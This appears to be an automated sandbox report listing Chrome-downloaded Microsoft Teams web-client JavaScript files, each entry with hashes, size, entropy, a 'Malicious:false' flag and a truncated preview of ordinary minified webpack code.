                                                                                                                                                                                                                                                                            MD5:6534E12740B5779AEFCC2D13470908FE
                                                                                                                                                                                                                                                                            SHA1:82D3EAD08E21724B1C2EDFF43D86CEBBD0D96AB5
                                                                                                                                                                                                                                                                            SHA-256:0723C2AC6263087ADBF214A6C2131DD6F42418C40524189BD80183D09692D7D6
                                                                                                                                                                                                                                                                            SHA-512:842F15B58D931B34AD0EE2BB2D46B1679DEF13F963362B44016100A7547FC3FFD17A3C9C4A67A573961544D959C7136721AC03A39BF481DB95A28639C8706A6B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[653800],{600093:(e,t,n)=>{var a,i;n.d(t,{d:()=>a,J:()=>i}),function(e){e.HighMemoryUsage="HighMemoryUsage",e.CallingStackInitTimeoutOrFailure="CallingStackInitTimeoutOrFailure",e.GroupCallTimeoutOrFailure="GroupCallTimeoutOrFailure"}(a||(a={})),function(e){e.MeetingsAudio="1",e.MeetingsVideoOrScreenSharing="2",e.CallingCallDrops="3",e.MessagingOther="5",e.ActivityFeed="6",e.Crashing="7",e.Files="8",e.SearchSERPSearchResultsPage="9",e.SearchPowerbarAutosuggest="10",e.Other="11",e.MeetingsLiveCaptionsOrTranscript="14",e.TeamsChannelsMembership="15",e.Accessibility="17",e.Calendar="18",e.MeetingsOther="19",e.PlatformApps="20",e.PlatformBotsConnectors="21",e.PlatformTabs="22",e.TeamsChannelsCreateManageSettings="23",e.MessagingSync="25",e.PeopleProfiles="26",e.StatusPresence="27",e.TeamsChannelsPrivateAndSharedChannels="28",e.LocalizationTranslation="29",e.MeetingsAgendaNotes="30
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (41773)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):41881
                                                                                                                                                                                                                                                                            Entropy (8bit):5.370482617886562
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:5ZNH3StVknxinkQQ62Eqrr+rAxvapmEKr0f/rt4g40KH:5ZACUnk/rr+rAxipmLr0f/rj4F
                                                                                                                                                                                                                                                                            MD5:22A4CD1FB7CB4D2F60EE393390C9A796
                                                                                                                                                                                                                                                                            SHA1:3D48FD9A67F1BD5D3E4B5909A4254F5D48469987
                                                                                                                                                                                                                                                                            SHA-256:EADFE9A27CDED1FB816A38BC313A0EA56D7C6633A33B3E2621CF9342FBF8BFAA
                                                                                                                                                                                                                                                                            SHA-512:FF5A1AB495EB01AD640E34A1FE6FA2311781017CB111785D0785EF531AF034E3D172871837EC28F78896D21CC4CB6A9AC0356FFDA6661E7D472BEF8C0A3B04EA
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[674958],{428561:function(e,t,n){var o,i;void 0===(i="function"==typeof(o=function(){"use strict";return function(e,t){var n,o,i,a,r,l,s,u,c,d,p,m,f,h,v,g,x,y,b=e.options.window||b,w=b.document,C=this,I=!1,T=!0,E=!0,_={barsSize:{top:44,bottom:"auto"},closeElClasses:["item","caption","zoom-wrap","ui","top-bar"],timeToIdle:4e3,timeToIdleOutside:1e3,loadingIndicatorDelay:1e3,addCaptionHTMLFn:function(e,t){if(!e.title){for(;t.children[0].firstChild;)t.children[0].removeChild(t.children[0].firstChild);return!1}return t.children[0].innerText=e.title,!0},closeEl:!0,captionEl:!0,fullscreenEl:!0,zoomEl:!0,shareEl:!0,counterEl:!0,arrowEl:!0,preloaderEl:!0,tapToClose:!1,tapToToggleControls:!0,clickToCloseNonZoomable:!0,shareButtons:[{id:"facebook",label:"Share on Facebook",url:"https://www.facebook.com/sharer/sharer.php?u={{url}}"},{id:"twitter",label:"Tweet",url:"https://twitter.com/intent/tweet?tex
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22831)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):22939
                                                                                                                                                                                                                                                                            Entropy (8bit):5.352894727770317
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:YTxPvTzTOTsTcvJKWTRvxbiTPB2mcnQAi4XX0Q5km3cGfEVc53+qg4zfLBJwzVoR:mVHoS+Qrm3cGIc53K8tJwxoNnuIa53Vi
                                                                                                                                                                                                                                                                            MD5:F70ED4AA684362939A4094E73EE14654
                                                                                                                                                                                                                                                                            SHA1:41C54AD9CF605653A08C49BB3255CB84EFC7AC17
                                                                                                                                                                                                                                                                            SHA-256:3F657976EC0B0E25DF25837FF6F97BF1EEED866950779CF0BF1B672C9154EAE4
                                                                                                                                                                                                                                                                            SHA-512:106F239C6BA71AEE702DE05A95621AD0858AC65658A3C2462B2E3FD2AC8A9C862578D94AB64CF8EFB7714CB0CE259601147DE180FF97A5E1533BD62BCD6DF8F7
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[459872],{150321:(e,t,n)=>{"use strict";function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},r.apply(this,arguments)}n.d(t,{A:()=>r})},90278:(e,t,n)=>{"use strict";n.d(t,{A:()=>o});var r=n(876653);function o(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,(0,r.A)(e,t)}},89968:(e,t,n)=>{"use strict";function r(e,t){if(null==e)return{};var n,r,o={},i=Object.keys(e);for(r=0;r<i.length;r++)n=i[r],t.indexOf(n)>=0||(o[n]=e[n]);return o}n.d(t,{A:()=>r})},876653:(e,t,n)=>{"use strict";function r(e,t){return r=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(e,t){return e.__proto__=t,e},r(e,t)}n.d(t,{A:()=>r})},353410:(e,t,n)=>{"use strict";function r(e,t){var n=Boolean(t.getRootNode&&t.getRootNode().host);if(e.contai
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47948)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):48056
                                                                                                                                                                                                                                                                            Entropy (8bit):5.488438690236072
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ElQCfATU72Qpii93NJQfhG/dSkcPDFjnKijWgYyi1MATzesw5f9qxw85hW/5vWic:OAo72K93NJKhtd1iOcfCswl/h0F7lVGI
                                                                                                                                                                                                                                                                            MD5:D4387B0B42E765E46693A8ACE3AF5E2F
                                                                                                                                                                                                                                                                            SHA1:5B3883F3B9E01D9C428C39FBE8600689E850242A
                                                                                                                                                                                                                                                                            SHA-256:8354F26155FC49722B3DD57DAFADD25C12A07DA830D17A5A056700234CF72A3C
                                                                                                                                                                                                                                                                            SHA-512:222A208432F39521092548557CB9985AE7153F96B4126EDE8AB4312608551DC7A7B2391C452CBD94BA9A99FD0CEA580A8A9B26B82D5BB2A84BDD78CD44C6612E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/805039-fbb121b637fb5d2f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805039],{492745:(e,a,t)=>{t.d(a,{I:()=>n});const n=(0,t(965804).O)({tagIcon:{sj55zd:"fk7sj7m",De3pzq:"f1traznj",a9b677:"fh32b2y",Bqenvij:"f1sw78cg",Bgfg5da:0,B9xav0g:0,oivjwe:0,Bn0qgzm:0,B4g9neb:0,zhjwy3:0,wvpqe5:0,ibv6hh:0,u1mtju:0,h3c5rm:0,vrafjx:0,Bekrc4i:0,i8vvqc:0,g2u3we:0,icvyot:0,B4j52fo:0,irswps:"f98wh1h",Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f5q2cvs",Byoj8tv:0,uwmqm3:0,z189sj:0,z8tnut:0,B0ocmuz:"f1ace9t4"},contrast:{De3pzq:"f1blnnmj",sj55zd:"fbz3ivo"}})},743196:(e,a,t)=>{t.d(a,{R:()=>o});var n=t(362328);const o={kind:"Document",get definitions(){const e=(0,n.G)("mutation sendSearchActionsInstrumentation($eventType:String!,$localTime:String!,$logicalId:String!,$metadata:String) {sendSearchActionsInstrumentation(eventType:$eventType,localTime:$localTime,logicalId:$logicalId,metadata:$metadata)}");return delete this.definitions,this.definitions=e.definitions}}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):343054
                                                                                                                                                                                                                                                                            Entropy (8bit):5.576072709720014
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:DqxiCcDud8nGFwieNrhuSX7LmYHb1Evk5w79mqmum5d41AE:FCcDu0GubtuSX7L378
                                                                                                                                                                                                                                                                            MD5:B9727149EC34D6036CA4E79D465C92E1
                                                                                                                                                                                                                                                                            SHA1:253CB50BA90E483A86A31D28EED829EEB8BF8E66
                                                                                                                                                                                                                                                                            SHA-256:2EB85482C1EB8CDF46FFEBCB20E72D04D7ABB6920A74D191ED97C5F9D837A089
                                                                                                                                                                                                                                                                            SHA-512:FB16255CC17EAFFB58A037CD969D46E7F72EA79D2CFDE81E199D5AED8EF9EC3A77D9E54DDBBD09615804476972AEC62A737E3903A7DB11F5DB4163D8EB9E54DB
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/core-essentials-cff3a66715e805cb.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[407772],{73654:(e,t,n)=>{"use strict";n.d(t,{o:()=>s});var o=n(513432);const{useEffect:r,useRef:i,useState:a}=o;function s(e){const t=i(!1),n=i(new Image),[o,s]=a(!1);return e&&n.current.src!==e&&(n.current.src=e),n.current.onerror=()=>{t.current&&s(!0)},r((()=>(t.current||(t.current=!0),()=>{t.current=!1})),[]),o}},808761:(e,t,n)=>{"use strict";n.d(t,{O:()=>s});var o=n(193021),r=n(707754),i=n(332752),a=n(440320);function s(e,t,{coreShortcutService:n,shortcutExecutionService:s,enableShortcutPropagation:c,isBridge:l,windowProvider:d,windowId:u,clientPreferences:p}={},g,h){const m=d||(0,o.z)(),S=/Mac|iPod|iPhone|iPad/.test(navigator.platform),{applyDesktopKeymappingStrategy:C,applySurfaceHubKeymappingStrategy:y,enableDevShortcuts:f,enableShortcutRegistrationWithDesktopClient:A,enableGlobalShortcuts:I,globalShortcuts:b,useF6LandmarkDesktop:v,revertMacOptShortcuts:w}=t.get(i.w.Shortcuts,["app
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:1
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61423)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):61529
                                                                                                                                                                                                                                                                            Entropy (8bit):5.454599062626855
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:J8D47fVcFkRgOtD5Pjh3qExlWu8ioo/MI7wufTgthcPgLe49EnK/EnNckeLEp7OB:J8afVRgOtD5PjK/6UvsDNhdc
                                                                                                                                                                                                                                                                            MD5:2C88D627F2227B847B39CF3AEAAB764B
                                                                                                                                                                                                                                                                            SHA1:07EBE3F9EFA0EDDE0636C87145435823CF7D2D92
                                                                                                                                                                                                                                                                            SHA-256:BD6AE54FCAFB683F37420DA8D9FC2FB47B49C362E2CA1E1BED3FDD58CB4E9C53
                                                                                                                                                                                                                                                                            SHA-512:204089BB8FC57537EE32F368220D7A828D2502C196BA656411EA0CCFC6FF3305E2A20B2A9BAFA5146DF636E5978A282A0B10FC2A93BEF23D0F776F132FE41550
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/2754-647e8ddd158555f8.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[2754],{719156:e=>{var t;!function(e){!function(e){!function(e){e[e.None=0]="None",e[e.Notified=1]="Notified",e[e.Connecting=2]="Connecting",e[e.Connected=3]="Connected",e[e.LocalHold=4]="LocalHold",e[e.RemoteHold=5]="RemoteHold",e[e.Disconnecting=6]="Disconnecting",e[e.Disconnected=7]="Disconnected",e[e.Observing=8]="Observing",e[e.EarlyMedia=9]="EarlyMedia",e[e.InLobby=10]="InLobby",e[e.Preheating=11]="Preheating",e[e.Preheated=12]="Preheated",e[e.Staging=13]="Staging",e[e.NegotiatingEncryption=14]="NegotiatingEncryption",e[e.NegotiatingEncryptionLobby=15]="NegotiatingEncryptionLobby"}(e.CallState||(e.CallState={})),function(e){e[e.Testing=0]="Testing",e[e.MicrosoftWNS=1]="MicrosoftWNS",e[e.MicrosoftWP7NS=2]="MicrosoftWP7NS",e[e.AppleAPN=3]="AppleAPN",e[e.GoogleAGCM=4]="GoogleAGCM",e[e.Hotmail=5]="Hotmail",e[e.GoogleAC2DM=6]="GoogleAC2DM",e[e.Trouter=7]="Trouter",e[e.Griffin=8]="Griffin"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6319)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):6427
                                                                                                                                                                                                                                                                            Entropy (8bit):4.4308482631155695
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:mzzHyNX1EuXaOX4XLlCOqZ09wz4mgIbwrLgIbVqZL2LKaXp1FmpvZKC64t0BMwnJ:smmY/i5mgJghL2dpLmpxu4+GwrX1X
                                                                                                                                                                                                                                                                            MD5:6AB4C01752844AD21C4E0BAC95CF24BB
                                                                                                                                                                                                                                                                            SHA1:0AE7E23782C4513D303DA88FEA3005A7A8D1A303
                                                                                                                                                                                                                                                                            SHA-256:0AA43576327DB0F8B6575E6BB0BCB139B3865E1D734BA61D17A73853C836B687
                                                                                                                                                                                                                                                                            SHA-512:FC30BE1341B69DFEF9AD6588F53F5EBAFFB7F5984654F8CEA153B12FCA6CE4365762F6843CF660EC1305BEBF966FA5B68E09F7BBDE9868597BF0022E50BEC3A3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/724003-7c9ea89e48351def.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[724003],{724003:(a,l,c)=>{c.d(l,{u5x:()=>h,Bv$:()=>Z,TRI:()=>v,fXE:()=>r,wMk:()=>M,WtI:()=>m,Ukm:()=>t,GTQ:()=>A,c_W:()=>S,cOo:()=>u,UE_:()=>U,ecH:()=>R,RUt:()=>V});var e=c(693935);const h=(0,e.U)("Search16Regular","16",["M9.3 10.02a4.5 4.5 0 1 1 .7-.7l3.85 3.83a.5.5 0 0 1-.7.7L9.3 10.02ZM10 6.5a3.5 3.5 0 1 0-7 0 3.5 3.5 0 0 0 7 0Z"]),Z=(0,e.U)("Search20Filled","20",["M8.5 3a5.5 5.5 0 0 1 4.38 8.82l4.15 4.15a.75.75 0 0 1-.98 1.13l-.08-.07-4.15-4.15A5.5 5.5 0 1 1 8.5 3Zm0 1.5a4 4 0 1 0 0 8 4 4 0 0 0 0-8Z"]),v=(0,e.U)("Search20Regular","20",["M8.5 3a5.5 5.5 0 0 1 4.23 9.02l4.12 4.13a.5.5 0 0 1-.63.76l-.07-.06-4.13-4.12A5.5 5.5 0 1 1 8.5 3Zm0 1a4.5 4.5 0 1 0 0 9 4.5 4.5 0 0 0 0-9Z"]),r=(0,e.U)("Search24Regular","24",["M4.5 10a5.5 5.5 0 1 1 11 0 5.5 5.5 0 0 1-11 0ZM10 3a7 7 0 1 0 4.4 12.45l5.32 5.33a.75.75 0 1 0 1.06-1.06l-5.33-5.33A7 7 0 0 0 10 3Z"]),M=(0,e.U)("Settings20Regular
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (62375), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):73859
                                                                                                                                                                                                                                                                            Entropy (8bit):5.5092296140052985
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:lCth9qrU23xkE6VvHlGxtY+vo1XPuGxIJ:c2BkEKok+voESIJ
                                                                                                                                                                                                                                                                            MD5:F9CFAD83CEA140B7C8BFCD7234676ED4
                                                                                                                                                                                                                                                                            SHA1:061A52298D46B62598CAB7959FC11D58A548362E
                                                                                                                                                                                                                                                                            SHA-256:A6DBF4B85629437AD65DBFDD733C99ED566893FBC599C8CAAC0B015C73F471B8
                                                                                                                                                                                                                                                                            SHA-512:A1C72677FCDA27DAD02CB6A935411D863C38FF8A3E76B88685EE88FDE77E68902F79A4302749405EFF8E9D809395308DCB81E7E639206AFD83E87EEE25D7C3B1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[710639],{861782:(t,e,r)=>{var i=r(8605),s=r(548738),n={__proto__:null,style:!0,script:!0,xmp:!0,iframe:!0,noembed:!0,noframes:!0,plaintext:!0,noscript:!0};var a={__proto__:null,area:!0,base:!0,basefont:!0,br:!0,col:!0,command:!0,embed:!0,frame:!0,hr:!0,img:!0,input:!0,isindex:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0},o=t.exports=function(t,e){Array.isArray(t)||t.cheerio||(t=[t]),e=e||{};for(var r="",s=0;s<t.length;s++){var n=t[s];"root"===n.type?r+=o(n.children,e):i.isTag(n)?r+=c(n,e):n.type===i.Directive?r+=h(n):n.type===i.Comment?r+=p(n):n.type===i.CDATA?r+=u(n):r+=l(n,e)}return r};function c(t,e){"svg"===t.name&&(e={decodeEntities:e.decodeEntities,xmlMode:!0});var r="<"+t.name,i=function(t,e){if(t){var r,i="";for(var n in t)i&&(i+=" "),i+=n,(null!==(r=t[n])&&""!==r||e.xmlMode)&&(i+='="'+(e.decodeEntities?s.encodeXML(r):r)+'"');return i}}(t.attribs,e);return i&&(r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (59967)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):60075
                                                                                                                                                                                                                                                                            Entropy (8bit):5.518703276003212
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:XBE4rKleGEo9R+ueSRMcGcDpPRg5Nq07f+gUSeUzOVfC6Sqa9rPWpNsv0H7+N28l:XjC9RGcDgGOqZy
                                                                                                                                                                                                                                                                            MD5:F1A6F6A17533339038ED2014DE129AF2
                                                                                                                                                                                                                                                                            SHA1:A3F9661331744D6204B840138D43666B6F16D4F4
                                                                                                                                                                                                                                                                            SHA-256:1F0845F24545A58DF4081FCF0EA1D4E144C00098A783005561D8FF0169855776
                                                                                                                                                                                                                                                                            SHA-512:61F70D9D595D91B92AD561CAD3B08AC34B9183A8164318AA59C46BADAFF7EA4C8B1D5E44121F16F68D262BEA36FB3A12C5B5723423DC84FDC357A84E35EE570F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/266580-a896ed3c565f3b61.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[266580],{206008:(e,t,n)=>{n.d(t,{I:()=>o});const o=(0,n(965804).O)({dialogContentStyle:{mc9l5x:"f22iagw",Beiy3e4:"f1vx9l62",a9b677:"fdhnlf0"},dialogBodyLoadingStyle:{z8tnut:"f154whs3",Byoj8tv:"fwscnda",mc9l5x:"f22iagw",Beiy3e4:"f1vx9l62",Bt984gj:"f122n59",a9b677:"fly5x3f",jrapky:0,Frg6f3:0,t21cq0:0,B6of3ja:0,B74szlk:"fcpdi13"},dialogTitleStyle:{Bqenvij:"fvi13kb",Bhrd7zp:"f1leeax8",Be2twd7:"f1rt2boy",Bahqtrf:"fztbzda",Bg96gwp:"f49wi19",fsow6f:"f17mccla",a9b677:"fdhnlf0",B6of3ja:"f1rqyxcv"},dialogSubtext:{Brf1p80:"f4d9j23",Bhrd7zp:"f71fsbu"},forceEntraDialogSubtext:{Brf1p80:"f4d9j23",Bhrd7zp:"f71fsbu",fsow6f:"f17mccla",sj55zd:"fe3e8s9"},dialogProgressBarStyle:{a9b677:"fr584hq"},dialogActionButtonStyle:{mc9l5x:"f22iagw",z8tnut:"fc7z3ec",Byoj8tv:"fdghr9",uwmqm3:["fjlbh76","f11qrl6u"],z189sj:["f11qrl6u","fjlbh76"],Brf1p80:"f4d9j23",Bt984gj:"f122n59",Bf4jedk:"fn6pdc",Bqenvij:"favxu
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15497)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):15605
                                                                                                                                                                                                                                                                            Entropy (8bit):5.468955649965476
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:iRd8EabA2j7TJISNhQjujjO0/Iu6pAbONOzBo:m8EablPNhhKWIu6pAb26o
                                                                                                                                                                                                                                                                            MD5:0CF2320C179556FD02BCA7E4334F4C89
                                                                                                                                                                                                                                                                            SHA1:967BA55ED9AF744BB82DDD432062B437645BEF0E
                                                                                                                                                                                                                                                                            SHA-256:0EE917F8133E6C98FED6879B31C9AC36FED5BDD6BDE6BFA4EFE2ECFCC538B148
                                                                                                                                                                                                                                                                            SHA-512:E16F8D6D543704AABBED9184EDF536C736099F22699888E548ABE5509D123B7110C3116706F16E52E7CB173A712FDC1B3D7D23336D9A696C5DF54DB5240D5662
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/221963-5e2af34f8bc6a49a.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[221963,693593],{996411:(e,t,r)=>{"use strict";r.d(t,{A:()=>p});var n=r(749045),i=r(930591),o=r(207562),s=r(717798),a=r(151820),l=r(714907),u=function(e,t){return(0,i.VF)(function(e,t){var r=-1,n=44;do{switch((0,i.Sh)(n)){case 0:38===n&&12===(0,i.se)()&&(t[r]=1),e[r]+=(0,i.Cv)(i.G1-1);break;case 2:e[r]+=(0,i.Tb)(n);break;case 4:if(44===n){e[++r]=58===(0,i.se)()?"&\f":"",t[r]=e[r].length;break}default:e[r]+=(0,o.HT)(n)}}while(n=(0,i.K2)());return e}((0,i.c4)(e),t))},c=new WeakMap,d=function(e){if("rule"===e.type&&e.parent&&e.length){for(var t=e.value,r=e.parent,n=e.column===r.column&&e.line===r.line;"rule"!==r.type;)if(!(r=r.parent))return;if((1!==e.props.length||58===t.charCodeAt(0)||c.get(r))&&!n){c.set(e,!0);for(var i=[],o=u(t,i),s=r.props,a=0,l=0;a<o.length;a++)for(var d=0;d<s.length;d++,l++)e.props[l]=i[a]?o[a].replace(/&\f/g,s[d]):s[d]+" "+o[a]}}},f=function(e){if("decl"===e.type){var
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22831)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):22939
                                                                                                                                                                                                                                                                            Entropy (8bit):5.352894727770317
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:YTxPvTzTOTsTcvJKWTRvxbiTPB2mcnQAi4XX0Q5km3cGfEVc53+qg4zfLBJwzVoR:mVHoS+Qrm3cGIc53K8tJwxoNnuIa53Vi
                                                                                                                                                                                                                                                                            MD5:F70ED4AA684362939A4094E73EE14654
                                                                                                                                                                                                                                                                            SHA1:41C54AD9CF605653A08C49BB3255CB84EFC7AC17
                                                                                                                                                                                                                                                                            SHA-256:3F657976EC0B0E25DF25837FF6F97BF1EEED866950779CF0BF1B672C9154EAE4
                                                                                                                                                                                                                                                                            SHA-512:106F239C6BA71AEE702DE05A95621AD0858AC65658A3C2462B2E3FD2AC8A9C862578D94AB64CF8EFB7714CB0CE259601147DE180FF97A5E1533BD62BCD6DF8F7
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/459872-6142424fcf6e95ed.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[459872],{150321:(e,t,n)=>{"use strict";function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},r.apply(this,arguments)}n.d(t,{A:()=>r})},90278:(e,t,n)=>{"use strict";n.d(t,{A:()=>o});var r=n(876653);function o(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,(0,r.A)(e,t)}},89968:(e,t,n)=>{"use strict";function r(e,t){if(null==e)return{};var n,r,o={},i=Object.keys(e);for(r=0;r<i.length;r++)n=i[r],t.indexOf(n)>=0||(o[n]=e[n]);return o}n.d(t,{A:()=>r})},876653:(e,t,n)=>{"use strict";function r(e,t){return r=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(e,t){return e.__proto__=t,e},r(e,t)}n.d(t,{A:()=>r})},353410:(e,t,n)=>{"use strict";function r(e,t){var n=Boolean(t.getRootNode&&t.getRootNode().host);if(e.contai
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2234)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):2342
                                                                                                                                                                                                                                                                            Entropy (8bit):4.777133342218861
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3Lk0T3xl2DkuBuXLgQhsrrzb3fYosOVeCL1TworW7kFAQq:Vk02Dpcbh4rzDFVxpTwn0xq
                                                                                                                                                                                                                                                                            MD5:934D2952A100D5FD1D5400A7DC870E88
                                                                                                                                                                                                                                                                            SHA1:EC89C116E3D50D06BFDCB31CC2A3A4DC0F5BF87A
                                                                                                                                                                                                                                                                            SHA-256:FBC293508A37DD05FDF4D716E965E6831920B4D76C0BB95A1E5BF621BF132976
                                                                                                                                                                                                                                                                            SHA-512:A66A0213EAE6770956267802272180569F3EC79A3E8A4A967B25E4C0890D78E35E46E77526FAF390609FCD02FFCEAD0DB8083181158A5BE6E93012559D9794D5
                                                                                                                                                                                                                                                                            Malicious:false
